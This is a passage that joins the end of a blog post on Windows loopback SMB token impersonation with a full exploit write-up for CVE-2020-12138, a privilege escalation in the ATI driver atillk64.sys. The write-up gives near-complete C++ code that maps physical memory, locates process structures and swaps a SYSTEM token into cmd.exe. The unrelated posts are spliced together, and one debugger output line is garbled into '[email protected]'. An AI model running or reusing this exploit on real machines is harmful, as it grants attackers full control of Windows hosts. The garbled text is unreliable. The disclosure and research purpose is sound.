Well, that puts an end to that. But wait, what Token would we get from a loop back authentication over SMB? Let's try it. First create a named pipe and start it listening for a new connection.

PS> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path
PS> $job = Start-Job { $pipe.Listen() }

Next open a handle to the pipe via localhost, and then wait for the job to complete.

PS> $file = Get-NtFile \\localhost\pipe\ABC -Win32Path
PS> Wait-Job $job | Out-Null

Finally open the RPCSS process again while impersonating the named pipe.

PS> $p = Use-NtObject($pipe.Impersonate()) {
>> Get-NtProcess -ProcessId 1152
>> }
PS> $p.GrantedAccess
AllAccess

How on earth does that work? Remember I said that the Token stored by LSASS is the first token created in that Logon Session? Well the first NETWORK SERVICE process is RPCSS, so the Token which gets saved is RPCSS's one. We can prove that by opening the impersonation token and looking at the group list.

PS> $token = Use-NtObject($pipe.Impersonate()) {
>> Get-NtToken -Impersonation
>> }
PS> $token.Groups | ? Name -Match Rpcss
Name             Attributes
----             ----------
NT SERVICE\RpcSs EnabledByDefault, Owner

Weird behavior, no? Of course this works for every logon session, though a normal user's session isn't quite so interesting. Also don't forget that if you access the admin shares as NETWORK SERVICE you'll actually be authenticated as the RPCSS service so any files it might have dropped with the Service SID would be accessible. Anyway, I'm sure others can come up with creative abuses of this.

The Human Machine Interface

CVE-2020-12138 Exploit Proof-of-Concept, Privilege Escalation in ATI Technologies Inc. Driver atillk64.sys

By: h0mbre

25 April 2020 at 04:00

Background

I’ve been focusing, really since the end of January, on working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn some more about Windows kernel exploitation and have really enjoyed my time a lot.

During this time, @ihack4falafel released some proof-of-concept exploits[1][2] against several Windows kernel-mode drivers. The takeaway from these write-ups, for me, was that 3rd party drivers that are responsible for overclocking, RGB light-management, hardware diagnostics are largely broken.

The types of vulnerabilities that were disclosed in these write-ups often were related to low-privileged users having the ability to interact with a kernel-mode driver that was able to directly manipulate physical memory, where all kinds of privileged information resides.

The last FuzzySecurity Windows Exploit Development Tutorial Series is b33f’s exploit against a Razer driver exploiting this very same type of vulnerability.

Getting more interested in this type of bug, I sought out more write-ups and found some great proof-of-concepts:

Jackson T’s write-up of an LG driver privilege escalation vulnerability,
hatRiot’s write-up of a Dell driver privilege escalation vulnerability, and
ReWolf’s write-up of a few different driver vulnerabilities within the same type of logic bug realm.

After reading through those, I decided to just start downloading similar software and searching for drivers that I hadn’t seen CVEs for and that had some key APIs. My criteria when searching was that the driver had to:

allow low-privileged users to interact with it,
have either an MmMapIoSpace or ZwMapViewOfSection import.

As someone who is very new to this type of thing, I figured with the help of the aforementioned walkthroughs, if I was able to find a driver that would allow me to interact with physical memory I could successfully develop an exploit.

Disclaimer

This is kind of a niche space and as a new person getting into this very specific type of target I wasn’t really aware of the best places to look for more information about these types of vulnerable drivers. The first few things I checked were that there were no CVEs for the driver and that the driver hadn’t been mentioned on Twitter by security researchers. By the time I had reversed the driver and discovered it to be vulnerable in theory, but without a working exploit, I realized that the driver had been classified as vulnerable by researchers Jesse Michael and Mickey Shkatov at Eclypsium. The driver gets a small mention in their github repo but without specifically identifying the vulnerabilities that exist.

I’m not claiming responsibility for finding the vulnerability, since I was far from the first. Jesse and Mickey were given all of the credit on the CVE application and I can prove this upon request.

I was able to get in contact with Jesse via Twitter and he was extremely charitable with his time. He gave me a great explanation of their interactions with a vendor about the driver.

At this point, since there was no published proof-of-concept, I decided to press on and develop the exploit, which Jesse wholeheartedly supported and encouraged. I figured I’d develop an exploit, show AMD the proof-of-concept, and give them 90 days to respond/patch or explain that they’re not concerned.

Huge thanks to Jesse for being so charitable. He’s also incredibly knowledgeable and was willing to teach me tons of things along the way when answering my questions.

GIGABYTE Fusion 2.0

One of the first software packages I downloaded was GIGABYTE’s Fusion 2.0 software which comes with several drivers. I won’t get any more in-depth with the types of drivers included other than the subject of this post, atillk64.sys. Using default installation options, the driver was installed here: C:\Program Files (x86)\GIGABYTE\RGBFusion\AtiTool\atillk64.sys.

The driver file description states the product name is ATI Diagnostics version 5.11.9.0 and its copyright is ATI Technologies Inc. 2003. I’m not sure what other software packages out there also install this driver, but I’m sure Fusion 2.0 isn’t the only one. I’ve found that several of these hardware diagnostic/configuration software suites install licensed drivers that are often slightly modified (or not modified at all!) versions of known-to-be vulnerable code-bases like the classic WinIO.sys.

atillk64.sys Analysis

The first thing I needed to know was what types of permissions the driver had and if lower-privileged users could interact with the driver. Looking at the device with OSR’s devicetree, we can see that this is the case.

Reversing the driver was pretty easy even as a complete novice just because it is so small. There is hardly any surface area to explore and the IOCTL handler routine was pretty straightforward. MmMapIoSpace was one of the imports so I was already interested at this point.

One routine caught my attention early on because the API call chain was very similar to one of the driver routines that @ihack4falafel wrote up a proof-of-concept for.

The routine first calls MmMapIoSpace, which takes a physical address as a parameter and a length (and cache type) and maps that memory into system memory and returns a pointer to the now virtual address that corresponds to the beginning of the physical memory you asked to be mapped. So at this point, this system address is not available to us as a userland process. It is stored in rax and the result is checked to make sure the API call succeeded and did not return NULL. After some experimentation, as long as we pass a check that our input buffer is 0x18 in length, we are able to completely control two of the MmMapIoSpace parameters: NumberOfBytes and PhysicalAddress. These values are taken from rdi offsets which is the address of our input buffer. CacheType is hardcoded as 0.
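To make the length check concrete, here is a sketch of what a 0x18-byte request could look like. The field order and sizes are purely hypothetical (the text above only establishes that the buffer must be 0x18 bytes long and that PhysicalAddress and NumberOfBytes are read from offsets within it), and build_request is a made-up helper name.

```python
import struct

INPUT_LEN = 0x18  # the input buffer length the driver checks for

def build_request(physical_address, number_of_bytes):
    """Pack a request buffer; the layout below is an assumption, not the real one."""
    # Hypothetical layout: two little-endian 64-bit fields, zero-padded to 0x18 bytes
    buf = struct.pack("<QQ", physical_address, number_of_bytes)
    return buf.ljust(INPUT_LEN, b"\x00")

req = build_request(0x100000000, 0x1000)
print(len(req) == INPUT_LEN)  # True
```

The real offsets would need to be read out of the disassembly (the rdi-relative loads) before a buffer like this is of any use against the driver.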

If the call succeeded, a call is made to IoAllocateMdl with the same values. The virtual address returned by MmMapIoSpace is given as a parameter as well as the same Length value. This API also associates our newly created MDL with an IRP.

If the call succeeded, a subsequent call is made to MmBuildMdlForNonPagedPool which takes the MDL we just created and ‘updates it to describe the underlying physical pages.’ MSDN states that IoAllocateMdl doesn’t initialize the data array that follows the MDL structure, and that drivers should call MmBuildMdlForNonPagedPool to initialize the array and describe the physical memory in which the buffer resides.

Next is a call to MmMapLockedPages, which is an old and deprecated API. This call takes the updated MDL and maps the physical pages it describes into our process space. It returns the starting address of this mapping: the return value (rax) is eventually placed in rbx and moved to [rdi], which will be our output buffer in DeviceIoControl.

Subsequent API calls to IoFreeMdl and MmUnmapIoSpace perform some cleanup and free up the pool allocations (as far as I know, please correct me if I’m wrong).
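To make the request format from this walk-through concrete, here is a minimal sketch of a 0x18-byte input buffer. The struct and field names are hypothetical; the only things taken from the analysis are the total size and the fact that the physical address and byte count are attacker-controlled. The third field is assumed to be unused filler.

```cpp
#include <cstddef>
#include <cstdint>

// Hypothetical mirror of the 0x18-byte request the driver expects.
// Names are illustrative; only the size and the meaning of the first
// two fields come from the reversing notes.
struct MapRequest {
    std::uint64_t physical_address;  // forwarded as PhysicalAddress
    std::uint64_t number_of_bytes;   // forwarded as NumberOfBytes
    std::uint64_t padding;           // assumed unused, pads to 0x18 bytes
};

static_assert(sizeof(MapRequest) == 0x18,
              "the driver checks for a 0x18-byte input buffer");
static_assert(offsetof(MapRequest, number_of_bytes) == 0x8,
              "second field sits at +0x8");

// Builds a request asking for `length` bytes starting at `phys`.
constexpr MapRequest make_request(std::uint64_t phys, std::uint64_t length) {
    return MapRequest{phys, length, 0x4141414141414141ULL};
}
```

The static_assert lines double as documentation: if a compiler ever padded the struct differently, the build would fail instead of sending a malformed request.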

Exploitation Strategy

The first 8 bytes of our output buffer at this point hold a pointer to the mapped memory in our process space.

Say we mapped 0x1000 bytes from physical address 0x100000000: all of the data from 0x100000000 to 0x100001000 would be available to us within our process space. This is bad because we are a low-privileged process and this data can contain arbitrary system/privileged data.

The strategy for exploiting this was heavily informed by FuzzySec’s approach to exploiting his aforementioned Razer driver. At a high-level we are going to:

map physical memory into our process space,
parse through the data looking for “Proc” pool tags,
identify our calling process (typically cmd.exe) and note the location of our security token,
identify a process typically running as SYSTEM (something like lsass.exe) and note the value of its security token,
and finally, overwrite our token with the SYSTEM process token value to gain nt authority\system.

“Proc” Tags in the Pool

Following along with FuzzySec’s strategy here, the first thing we need to do is identify what these data structures actually look like in the pool. There will be a pool chunk header, which carries a tag, prepended to each pool allocation. The tag we’ll be looking for in our mapped memory is “Proc”, which is 0x636f7250 when its four bytes are read as a little-endian integer.
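As a quick check of that constant, the sketch below packs a four-character tag into the 32-bit value you get when the bytes are read little-endian. The helper name pool_tag is made up for illustration.

```cpp
#include <cstdint>

// Packs a four-character pool tag into the 32-bit value obtained when the
// tag bytes are read as a little-endian integer (first char = lowest byte).
constexpr std::uint32_t pool_tag(const char (&tag)[5]) {
    return  static_cast<std::uint32_t>(static_cast<unsigned char>(tag[0]))
         | (static_cast<std::uint32_t>(static_cast<unsigned char>(tag[1])) << 8)
         | (static_cast<std::uint32_t>(static_cast<unsigned char>(tag[2])) << 16)
         | (static_cast<std::uint32_t>(static_cast<unsigned char>(tag[3])) << 24);
}

// 'P' = 0x50, 'r' = 0x72, 'o' = 0x6f, 'c' = 0x63
static_assert(pool_tag("Proc") == 0x636f7250, "matches the value quoted above");
```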

To find some examples, we can use the kd !poolfind "Proc" command to identify pool allocations with our tag.

Looking at the output, we see we started scanning large pool allocations for the tag. I quit the process after 5 minutes or so as this should be enough sample data.

Scanning large pool allocation table for tag 0x636f7250 (Proc) (ffffd48c9d250000 : ffffd48c9d550000)

ffffd48ca040f340 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca10bd380 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca53b83e0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca21c60b0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48cb36e6410 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca09533b0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca08c8310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9bfd40c0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9e59d310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9fce0310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca150f400 : tag Proc, size     0xb70, Nonpaged pool
ffffd48cae7de390 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca0ddc330 : tag Proc, size     0xb70, Nonpaged pool

Just plugging in the first address there in the WinDBG Preview memory pane, we can see that from this address, if we subtract 0x10 and then add 0x4, we see our “Proc” tag.

kd> da ffffd48ca040f340-0x10+0x4
ffffd48c`a040f334  "[email protected]"

So we’ve identified a “Proc” pool allocation and we have a good idea of how they are allocated. As b33f explains, they are all 0x10 aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4 that is where a “Proc” tag might be.

So the first strategy we’ll employ in parsing for the data we’re interested in is to start at our mapped address, step forward 0x10 at a time, and check the value at our address + 0x4 for “Proc”.
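A minimal sketch of that scan over an ordinary byte buffer, assuming a little-endian host such as x64. The function names are hypothetical, and the buffer stands in for one mapped chunk of memory.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

constexpr std::uint32_t kProcTag = 0x636f7250;  // "Proc"

// Reads a 32-bit value without assuming alignment.
inline std::uint32_t read_u32(const std::uint8_t* p) {
    std::uint32_t v;
    std::memcpy(&v, p, sizeof v);
    return v;
}

// Returns every 0x10-aligned offset whose dword at +0x4 equals "Proc".
inline std::vector<std::size_t> find_proc_candidates(const std::uint8_t* buf,
                                                     std::size_t len) {
    assert(buf != nullptr);
    std::vector<std::size_t> hits;
    // off + 0x8 <= len keeps the 4-byte read at off + 0x4 inside the buffer.
    for (std::size_t off = 0; off + 0x8 <= len; off += 0x10) {
        if (read_u32(buf + off + 0x4) == kProcTag) {
            hits.push_back(off);
        }
    }
    return hits;
}
```

A hit here is only a candidate: any 0x10-aligned data that happens to contain those four bytes at +0x4 will match, which is why a second check is needed.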

From here, we can appeal to the EPROCESS structure to find the hardcoded offsets to EPROCESS members we’re interested in, which are going to be:

ImageFileName (the name of the process),
UniqueProcessId, and
Token.

I did all my testing on Windows 10 build 18362 and these were the offsets:

kd> !process 0 0 lsass.exe
PROCESS ffffd48ca64e7180
    SessionId: 0  Cid: 0260    Peb: 63d241d000  ParentCid: 01f0
    DirBase: 1c299b002  ObjectTable: ffffe60f220f2580  HandleCount: 1155.
    Image: lsass.exe

kd> dt nt!_EPROCESS ffffd48ca64e7180 UniqueProcessId Token ImageFilename
   +0x2e8 UniqueProcessId : 0x00000000`00000260 Void
   +0x360 Token           : _EX_FAST_REF
   +0x450 ImageFileName   : [15]  "lsass.exe"

So we can see that from the address that would normally be given to us if we did a !poolfind search for “Proc”, it is

0x2e8 to the UniqueProcessId,
0x360 to the Token, and
0x450 to the ImageFileName.

So in our minds right now, our allocations look like this (thanks to ReWolf for breaking this down so well):

POOL_HEADER structure (this is where our tag will reside),
OBJECT_HEADER_xxx_INFO structures,
OBJECT_HEADER, which contains a Body where the EPROCESS structure lives.

The problem I found was that process to process, the size of these structures in between our “Proc” address and the point where our EPROCESS structure begins was wildly varied. Sometimes they were 0x20 in size, sometimes up to 0x90 during my testing. So right now my understanding of these allocations looks something like this:

if <0x10-aligned address> + 0x4 == "Proc"

then <0x10-aligned address> + <some intermediate structure size(somewhere between 0x20 and 0x90 typically)> == <beginning of EPROCESS>

then <beginning of EPROCESS> + 0x2e8 == UniqueProcessId
then <beginning of EPROCESS> + 0x360 == Token
then <beginning of EPROCESS> + 0x450 == ImageFileName

So my code had to account for the varying sizes of these structures; let’s just informally call them “headers” for now. I noticed that all of these “header” structures ended with a 4-byte marker value of 0x00B80003. So what my code would now do is,

find “Proc” by looking at 0x10-aligned addresses and looking at the 4-byte value at +0x4,
once found, iterate 0x10 at a time up to offset 0xA0 (since the largest header size I found was 0x90) looking for 0x00B80003,
take the location of “Proc” and add it to a vector,
take the offset to 0x00B80003 and add it to a vector since we need to know this “header” size to calculate our way to the EPROCESS members we’re interested in.
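The marker search in the steps above could be sketched as follows. This is an illustration on a plain buffer, assuming a little-endian host; find_header_size is a hypothetical name, and the 0xA0 bound follows the prose rather than the 0x100 bound used in the exploit code.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

constexpr std::uint32_t kHeaderMarker = 0x00B80003;
constexpr std::size_t kMaxHeaderScan = 0xA0;  // largest header seen was 0x90

// Reads a 32-bit value without assuming alignment.
inline std::uint32_t read_u32(const std::uint8_t* p) {
    std::uint32_t v;
    std::memcpy(&v, p, sizeof v);
    return v;
}

// `chunk` points at the 0x10-aligned start of a candidate "Proc" chunk.
// Returns the offset of the marker from that start, or -1 if none is found
// within the scan window or the available bytes.
inline std::ptrdiff_t find_header_size(const std::uint8_t* chunk,
                                       std::size_t available) {
    assert(chunk != nullptr);
    for (std::size_t x = 0;
         x <= kMaxHeaderScan && x + sizeof(std::uint32_t) <= available;
         x += 0x10) {
        if (read_u32(chunk + x) == kHeaderMarker) {
            return static_cast<std::ptrdiff_t>(x);
        }
    }
    return -1;
}
```

Returning -1 lets the caller discard "Proc" matches that are not followed by a marker instead of recording a bogus header size.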

So now that we have both the location of a “Proc” and the size of the header, we can accurately get UniqueProcessId, Token, and ImageFileName values.

(“Proc” - 0x4) + header-size + 0x2e8 = UniqueProcessId,
(“Proc” - 0x4) + header-size + 0x360 = Token,
(“Proc” - 0x4) + header-size + 0x450 = ImageFileName.

As an example, take this “Proc” tag found by !poolfind:

FFFFD48C`B102D320  00 00 B8 02 50 72 6F 63 39 B0 0D A6 8C D4 FF FF  ....Proc9.......
FFFFD48C`B102D330  00 10 00 00 88 0A 00 00 48 00 00 00 FF E8 2E F6  ........H.......
FFFFD48C`B102D340  C0 D4 66 2F 05 F8 FF FF 24 F6 FF FF E8 1F F6 FF  ..f/....$.......
FFFFD48C`B102D350  4A 7F 03 00 00 00 00 00 07 00 00 00 00 00 00 00  J...............
FFFFD48C`B102D360  00 00 00 00 00 00 00 00 93 00 08 00 F6 FF FF E8  ................
FFFFD48C`B102D370  C0 D4 66 2F 05 F8 FF FF 6B 85 EE 27 0F E6 FF FF  ..f/....k..'....
FFFFD48C`B102D380  03 00 B8 00 00 00 00 00 A0 04 0D A2 8C D4 FF FF  ................

We can see that “Proc” sits at 0xFFFFD48CB102D320 + 0x4. Our header marker 0x00B80003, denoting where the header ends, is at offset 0x60 from 0xFFFFD48CB102D320. We can test that we can find the ImageFileName given this information as follows:

kd> da 0xFFFFD48CB102D320 + 0x60 + 0x450
ffffd48c`b102d7d0  "svchost.exe"

So this looks promising.
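The same arithmetic can be written down once and reused. The sketch below uses the build 18362 offsets quoted earlier; the struct and function names are hypothetical.

```cpp
#include <cstdint>

// EPROCESS member offsets quoted above for Windows 10 build 18362.
constexpr std::uint64_t kUniqueProcessIdOffset = 0x2e8;
constexpr std::uint64_t kTokenOffset           = 0x360;
constexpr std::uint64_t kImageFileNameOffset   = 0x450;

struct MemberAddresses {
    std::uint64_t unique_process_id;
    std::uint64_t token;
    std::uint64_t image_file_name;
};

// chunk_base is the 0x10-aligned address whose +0x4 dword is "Proc";
// header_size is the offset from chunk_base to the 0x00B80003 marker.
constexpr MemberAddresses locate_members(std::uint64_t chunk_base,
                                         std::uint64_t header_size) {
    return MemberAddresses{
        chunk_base + header_size + kUniqueProcessIdOffset,
        chunk_base + header_size + kTokenOffset,
        chunk_base + header_size + kImageFileNameOffset,
    };
}

// Reproduces the svchost.exe example: 0x...D320 + 0x60 + 0x450 = 0x...D7D0.
static_assert(locate_members(0xFFFFD48CB102D320ULL, 0x60).image_file_name
                  == 0xFFFFD48CB102D7D0ULL,
              "matches the address shown by the debugger");
```

These offsets are specific to the tested build, so a different Windows version would need its own constants.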

Implementing Strategy in Code

One difficulty I faced on my Windows 10 build was that mapping large chunks at a time with DeviceIoControl calling our driver routine would often result in crashes. I didn’t have this problem at all on Windows 7. In my Windows 7 exploit I was able to map a 0x4CCCCCCC byte chunk and parse through the entire thing looking for the values I was after.

On Windows 10, I found the most stable approach to be to map 0x1000 (small page-sized) chunks at a time and then parse through these mapped chunks for my values. If I didn’t find my values, I would map another 0x1000. This too wasn’t crash free. I found that if I made too many mappings I would also crash so I had to find a sweet spot.

I also found that some calls to the driver routine with DeviceIoControl would return a failure. I wasn’t able to completely figure this out but my suspicion is that since our CacheType is hardcoded for us with MmMapIoSpace, if we tried to map pages that had been given a different CacheType in a previous mapping to a virtual address, it would fail. (Does this make sense?)

Picking a physical address to start mapping from is kind of arbitrary but I found the sweet spot on my Windows 10 VM to be around 0x200000000. This VM has about 8 GB of RAM. To limit the amount of mappings, I set a hard cap at 0x240000000 so that my exploit would stop mapping once it hit this address. I also toyed around with adding a limit to the amount of times DeviceIoControl is called but the exploit seems stable enough in testing that this wasn’t necessary in the end.
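For a sense of scale, this small sketch counts how many 0x1000-byte mappings fit between the start address and the hard cap. It assumes the cap itself is still mapped, which is how the exploit's bounds check behaves; max_mappings is a hypothetical helper.

```cpp
#include <cstdint>

constexpr std::uint64_t kPageSize = 0x1000;

// Upper bound on the number of page-sized mappings attempted when stepping
// from `start` to `cap` inclusive, one page at a time.
constexpr std::uint64_t max_mappings(std::uint64_t start, std::uint64_t cap) {
    return cap < start ? 0 : (cap - start) / kPageSize + 1;
}

// 0x200000000 .. 0x240000000 is a 1 GiB window: 0x40000 pages plus the
// page that starts exactly at the cap.
static_assert(max_mappings(0x200000000ULL, 0x240000000ULL) == 0x40001,
              "262,145 DeviceIoControl calls at most");
```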

I used two main functions. The first function maps memory iteratively, looking to identify the physical addresses of “Proc” tags that have our “header marker” value soon after. This function stores the address of each physical location, the size of the header offset, and the size of the offset from the beginning of the memory page to the “Proc” location. It stores all of these values in vectors which are the sole members of a struct which the function returns. The offset to the beginning of the page is simply calculated with a modulus operation and then the remainder is subtracted from the “Proc” location. I wanted to make sure I was always mapping from a nice 0x1000 aligned address. Here is some of that snipped code:

cout << "[>] Going fishing for 100 \"Proc\" chunks in RAM...\n\n";
    while (proc_count < 100)
    {
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = START_ADDRESS + (0x1000 * iteration);

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        if (input_buff.start_address > MAX_ADDRESS)
        {
            cout << "[!] Max address reached!\n";
            cout << "[!] Iterations: " << dec << iteration << "\n";
            exit(1);
        }
        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // The virtual address in our process space where RAM was mapped
            // is located in the first 8 bytes of our output_buff.
            INT64 mapped_address = *(PINT64)output_buff;

            // We will read a 32 bit value at offset i + 0x100 at some point
            // when looking for 0x00B80003, so we can't iterate any further
            // than offset 0xF00 here or we'll get an access violation.
            for (INT64 i = 0; i < (0xF10); i = i + 0x10)
            {
                INT64 test_address = mapped_address + i;
                INT32 test_value = *(PINT32)(test_address + 0x4);
                if (test_value == 0x636f7250)   // "Proc"
                {
                    for (INT64 x = 0; x < (0x100); x = x + 0x10)
                    {
                        INT64 header_address = test_address + x;
                        INT32 header_value = *(PINT32)header_address;
                        if (header_value == 0x00B80003) //  "Header" ending
                        {
                            // We found a "header", this is a legit "Proc"
                            proc_count++;

                            // This is the literal physical mem addr for the
                            // "Proc" pool tag
                            INT64 temp_addr = input_buff.start_address + i;
                            
                            // This address might not be page-aligned to 0x1000
                            // so find out how far off from a multiple of 
                            // 0x1000 we are. This value is stored in our 
                            // PROC_DATA struct in the page_entry_offset
                            // member.
                            INT64 modulus = temp_addr % 0x1000;
                            proc_data.page_entry_offset.push_back(modulus);
                            
                            // This is the page-aligned address where, either
                            // small or large paged memory will hold our "Proc"
                            // chunk. We store this as our proc_address member
                            // in PROC_DATA.
                            INT64 page_address = temp_addr - modulus;
                            proc_data.proc_address.push_back(
                                page_address);
                            proc_data.header_size.push_back(x);
                        }
                    }
                }
            }
            iteration++;
        }
        else
        {
            // DeviceIoControl failed
            iteration++;
            failures++;
        }
    }
    cout << "[>] \"Proc\" chunks found\n";
    cout << "    - Failed DeviceIoControl calls: " << dec << failures << "\n";
    cout << "    - Total DeviceIoControl calls: " << dec << iteration << "\n\n";

    // Returns struct of three vectors: the page-aligned address of each Proc
    // chunk, its offset within that page, and its header size.
    return proc_data;
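The page-alignment bookkeeping in the snippet above can be isolated into a tiny helper. This is a sketch with hypothetical names; it shows only the modulus step.

```cpp
#include <cstdint>

constexpr std::uint64_t kPageSize = 0x1000;

struct PageSplit {
    std::uint64_t page_base;       // 0x1000-aligned address to map from
    std::uint64_t offset_in_page;  // distance from page_base to the chunk
};

// Splits a physical address into its page base and the offset within it.
constexpr PageSplit split_page(std::uint64_t phys) {
    return PageSplit{phys - (phys % kPageSize), phys % kPageSize};
}

static_assert(split_page(0x200003A40ULL).page_base == 0x200003000ULL,
              "base is rounded down to a page boundary");
static_assert(split_page(0x200003A40ULL).offset_in_page == 0xA40,
              "remainder is the offset inside the page");
```

Storing both halves means the second pass can map from a page boundary and still land on the exact chunk by adding the offset back.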

The next function takes the returned proc_data struct and, for each entry, re-maps 0x1000 bytes of physical memory starting at the beginning of the page that contains the “Proc” chunk (the tag location minus 0x4). With the largest header length I found being 0x90 and the largest offset of interest being 0x450, we definitely don’t need to map this much, but I found that mapping anything less would sporadically lead to crashes as it wouldn’t be perfectly page-aligned.

The function knows the “Proc” tag location, the header size, and the offsets for valuable EPROCESS members, and goes looking for any process likely to be running as SYSTEM, as defined in a global vector.

vector<INT64> SYSTEM_procs = {
    0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    0x6578652e73736d73,         // smss.exe
    0x7365636976726573,         // services.exe
    0x6b6f72426d726753,         // SgrmBroker.exe
    0x2e76736c6f6f7073,         // spoolsv.exe
    0x6e6f676f6c6e6977,         // winlogon.exe
    0x2e74696e696e6977,         // wininit.exe
    0x6578652e736d6c77,         // wlms.exe
};
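The constants in that vector are the first eight bytes of each ImageFileName read as a little-endian 64-bit integer. A minimal sketch of how such a value can be derived, with pack_image_name as a hypothetical helper:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>

// Packs up to the first 8 bytes of `name` into a 64-bit value, lowest byte
// first, zero-padding names shorter than 8 characters.
inline std::uint64_t pack_image_name(const std::string& name) {
    assert(!name.empty());
    std::uint64_t value = 0;
    const std::size_t n = name.size() < 8 ? name.size() : 8;
    for (std::size_t i = 0; i < n; ++i) {
        value |= static_cast<std::uint64_t>(
                     static_cast<unsigned char>(name[i])) << (8 * i);
    }
    return value;
}
```

Because only eight bytes are compared, the match is case-sensitive and prefix-based: the entry for services.exe, for example, matches any image name that begins with "services".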

If it finds one of these processes and our cmd.exe process it will overwrite the cmd.exe Token with the Token value of a privileged process giving us an nt authority\system shell.

INT64 SYSTEM_token = 0;
    INT64 cmd_token_addr = 0;
    bool SYSTEM_found = false;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.proc_address.size(); i++)
    {
        // We need to map 0x1000 bytes from our "Proc" tag so that we can parse
        // out all the EPROCESS members we're interested in. The deepest member
        // is ImageFileName at offset 0x450 from the end of the header. Header
        // sizes varied from 0x20 to 0x90 in my testing. start_address will be
        // the address of the beginning of each 0x1000 aligned address closest
        // to the "Proc" tag we found.
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = proc_data.proc_address[i];

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        DWORD bytes_returned = 0;

        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // Pointer to the beginning of our process space with the mapped
            // 0x1000 bytes of physmem
            INT64 mapped_address = *(PINT64)output_buff;

            // mapped_address is mapping from our page entry where, on that
            // page, exists a "Proc" tag. Therefore, we need both the header
            // size and the offset from the page entry to the "Proc" tag so
            // we can calculate the static offsets/values of the EPROCESS
            // members ImageFileName, Token, UniqueProcessId...
            INT64 imagename_address = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x450; //ImageFileName
            INT64 imagename_value = *(PINT64)imagename_address;

            INT64 proc_token_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i] 
                + 0x360; //Token
            INT64 proc_token = *(PINT64)proc_token_addr;

            INT64 pid_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i] 
                + 0x2e8; //UniqueProcessId
            INT64 pid_value = *(PINT64)pid_addr;

            // See if the ImageFileName 64 bit hex value is in our vector of
            // common SYSTEM processes
            int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
                imagename_value);
            if (sys_result != 0 and SYSTEM_found == false)
            {
                SYSTEM_token = proc_token;
                cout << "[>] SYSTEM process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
                SYSTEM_found = true;
            }
            else if (imagename_value == 0x6568737265776f70 or
                imagename_value == 0x6578652e646d63)  // powershell or cmd
            {
                cmd_token_addr = proc_token_addr;
                cout << "[>] cmd.exe process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
            }
        }
        else
        {
            //DeviceIoControl failed
        }
    }
    if ((!cmd_token_addr) or (!SYSTEM_token))
    {
        cout << "[!] Token swapping requirements not met.\n";
        cout << "[!] Last physical address scanned: " << hex <<
            proc_data.proc_address.back() << ".\n";
        cout << "[!] Better luck next time!\n";
        exit(1);
    }
    else
    {
        *(PINT64)cmd_token_addr = SYSTEM_token;
        cout << "[>] SYSTEM and cmd.exe token info found, swapping tokens...\n";
        exit(0);
    }
}

As you can see, if we don’t find both a SYSTEM process and our cmd.exe process, the program exits without doing anything. This rarely happened as long as the test machine had been left running for at least 2-3 minutes after booting.
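Stripped of the driver interaction, the final step is just an 8-byte copy between two Token fields. The sketch below models that on ordinary buffers standing in for two EPROCESS structures; the names are hypothetical and the 0x360 offset is the build 18362 value from above.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

constexpr std::size_t kTokenOffset = 0x360;  // Token offset on build 18362

// Reads a 64-bit value without assuming alignment.
inline std::uint64_t read_u64(const std::uint8_t* p) {
    std::uint64_t v;
    std::memcpy(&v, p, sizeof v);
    return v;
}

// Writes a 64-bit value without assuming alignment.
inline void write_u64(std::uint8_t* p, std::uint64_t v) {
    std::memcpy(p, &v, sizeof v);
}

// Copies the 8-byte Token field from `donor` into `target`. Both pointers
// are assumed to reference the start of an EPROCESS-sized buffer.
inline void copy_token(const std::uint8_t* donor, std::uint8_t* target) {
    assert(donor != nullptr && target != nullptr);
    write_u64(target + kTokenOffset, read_u64(donor + kTokenOffset));
}
```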

